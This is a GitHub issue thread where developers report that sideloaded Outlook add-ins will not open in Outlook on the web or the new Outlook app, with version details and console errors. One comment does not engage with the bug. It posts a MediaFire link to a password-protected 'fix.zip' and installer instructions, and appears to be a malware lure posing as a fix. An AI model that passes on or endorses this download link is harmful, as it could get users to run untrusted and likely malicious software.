### ISSUE TITLE
Sideloaded outlook add-in does not open on OWA and New outlook app

### ISSUE THREAD

**Issue by kdeshpande-methodcrm** [OfficeDev/office-js#4830]
# Provide required information needed to triage your issue
Outlook add-in does not open on outlook web and the new outlook app on desktop. It seems to be opening fine on Outlook classic desktop app. Can reproduce the same on Mac, iOS and Windows. Tried to open other add-ins apart from add-in developed by us, same issue. I am using personal email (not a business email)
## Your Environment

* Platform [PC desktop, Mac, iOS, Office on the web]: PC desktop (New outlook only), Mac, iOS, Office on the web
* Host [Excel, Word, PowerPoint, etc.]: Outlook
* Office version number: 20240816003.13
* Operating System: Windows/Mac
* Browser (if using Office on the web): Chrome/Firefox/Edge
 
## Expected behavior

Outlook add-in should open. Currently it does not even open
## Current behavior

Outlook add-in does not open. 
## Steps to reproduce

1. Open any sideloaded add-in on web
2. Open any sideloaded add-in on outlook desktop new

## Link to live example(s)

1. Cannot open scriptlab add-in either

# Provide additional details

1. I am using personal email. Have not checked on a business email but as for '@outlook.com' emails, able to reproduce

## Context

Last week this was happening only to my email. My colleague's email did not have the same issue. It seemed to happen randomly for some email addresses. Today, I am able to consistently reproduce for all emails.
## Useful logs

- [ Uncaught (in promise) Error: UpdateUserGroupsSetConfiguration failed: Microsoft.Exchange.Clients.Owa2.Server.Core.OwaSerializationException
    at g (owa.mailindex.666993ef.js:1:111451)
    at owa.mailindex.666993ef.js:1:114282
    at owa.mailindex.666993ef.js:1:114452
    at async g (owa.UnifiedGroupLoad.m.7a43a213.js:1:3554) ] Console errors
- [ 
![image](https://github.com/user-attachments/assets/6d850385-dbfa-4695-a35e-22bd1e91f009)
] Screenshots

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DmitryKostochko** [comment]
We can also reproduce the issue in new Outlook and Outlook Online. The "Translator for Outlook" and "Report message" add-ins do not open.

Microsoft Outlook Version 1.2024.821.200 (Production).
Client Version is 20240816003.13.
WebView2 Version is 127.0.2651.105.

**Comment by andrew-at-acta** [comment]
> We can also reproduce the issue in new Outlook and Outlook Online. The "Translator for Outlook" and "Report message" add-ins do not open.
> 
> Microsoft Outlook Version 1.2024.821.200 (Production). Client Version is 20240816003.13. WebView2 Version is 127.0.2651.105.

I am experiencing the same issue.
